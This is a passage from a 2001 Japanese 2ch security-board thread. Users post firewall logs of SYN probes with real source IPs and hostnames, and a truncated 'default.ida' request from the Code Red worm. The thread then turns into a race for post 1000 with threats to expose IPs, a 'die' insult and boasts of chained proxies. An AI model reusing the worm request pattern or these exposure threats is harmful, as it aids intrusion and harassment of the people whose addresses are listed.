http://ton.2ch.net/test/read.cgi?bbs=sec&key=997282899
スレ立て失敗してしまいました。
申し訳ありません>皆様
失敗スレはは削除依頼に出しておきます・・

970 :名無しさん@お腹いっぱい。:2001/08/09(木) 18:45
211.103.56.46 (TCP Port 3520) [TCP Flags: S].
210.241.20.2 (TCP Port 4837) [TCP Flags: S].
210.160.99.130 (TCP Port 1072) [TCP Flags: S]. ns.it.iwasakinet.co.jp
210.109.62.98 (TCP Port 4476) [TCP Flags: S].
210.85.112.184 (TCP Port 3767) [TCP Flags: S]. 184.c210-85-112.ethome.net.tw
210.179.226.130 (TCP Port 3166) [TCP Flags: S].
210.216.153.20 (TCP Port 1939) [TCP Flags: S].
210.223.208.15 (TCP Port 4220) [TCP Flags: S].
210.85.17.20 (TCP Port 1193) [TCP Flags: S].
210.202.176.133 (TCP Port 2599) [TCP Flags: S].

971 :名無しさん@お腹いっぱい。:2001/08/09(木) 19:01
211.236.70.229 - - [09/Aug/2001:18:41:45 +0900] "GET
/default.ida?NNNNN

漏れ61なんだけど、今時N、更に違うグループ
ちょっと嬉しい。

972 :キリ番ゲッター:2001/08/10(金) 00:55
900超えスレッド発見

973 :キリ番ゲッター:2001/08/10(金) 00:55
1000狙う!!!!!!!!!!

974 :キリ番ゲッター:2001/08/10(金) 00:55
聞け俺様の独り言

975 :キリ番ゲッター:2001/08/10(金) 00:56
俺様が1000取れたらウラビデオ配布します

976 :キリ番ゲッター:2001/08/10(金) 00:57
だから俺様の1000取りを邪魔しないでくれた、まえ

977 :キリ番ゲッター:2001/08/10(金) 00:57
ようするに、俺様以外カキコ禁止

978 :霧番ゲッター2号:2001/08/10(金) 00:57
そんなことはさせないぞ!!

979 :キリ番ゲッター:2001/08/10(金) 00:58
邪魔したらオシオキとしてIPさらしあげします

980 :霧番ゲッター2号:2001/08/10(金) 00:58
わはははかきこんでやるぞ!!

981 :キリ番ゲッター:2001/08/10(金) 00:58
おお!!!! なんで邪魔するねん

982 :霧番ゲッター2号:2001/08/10(金) 00:58
ごめんよ。
さらさないでくれ。

983 :キリ番ゲッター:2001/08/10(金) 00:59
くそ〜〜〜〜〜〜  お前うざい あっちいけ

984 :キリ番ゲッター:2001/08/10(金) 00:59
つーか、氏ね

985 :霧番ゲッター2号:2001/08/10(金) 00:59
ごめんよ。
さらさないでくれ。
たのむ

986 :キリ番ゲッター:2001/08/10(金) 00:59
お前のIPはヤフーBBだ

987 :霧番ゲッター2号:2001/08/10(金) 01:00
しょうがない。しぬよ。。。

988 :キリ番ゲッター:2001/08/10(金) 01:00
俺様のIPは絶対に抜けん 多段串6個だ

989 :霧番ゲッター2号:2001/08/10(金) 01:00
>お前のIPはヤフーBBだ
ごめん、ぜんぜんちがうよ。。。

990 :キリ番ゲッター:2001/08/10(金) 01:01
CGI串としてロンギヌスもかましてある

991 :キリ番ゲッター:2001/08/10(金) 01:01
もうすぐだ・・・・ わくわく

992 :霧番ゲッター2号:2001/08/10(金) 01:01
おれのぬいてもいいよ。

993 :キリ番ゲッター:2001/08/10(金) 01:01
1000は必ず俺様がとる

994 :キリ番ゲッター:2001/08/10(金) 01:01
1000

995 :霧番ゲッター2号:2001/08/10(金) 01:02
つーか、ぬいてみてくれ。

996 :キリ番ゲッター:2001/08/10(金) 01:02
1000!!!!!!!!!!!!!!!!!!

997 :霧番ゲッター2号:2001/08/10(金) 01:02
あ。1000ばんか。

998 :キリ番ゲッター:2001/08/10(金) 01:02
1000

999 :キリ番ゲッター:2001/08/10(金) 01:02
1000

1000 :霧番ゲッター2号:2001/08/10(金) 01:02
あ。1000ばんか。

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

228 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)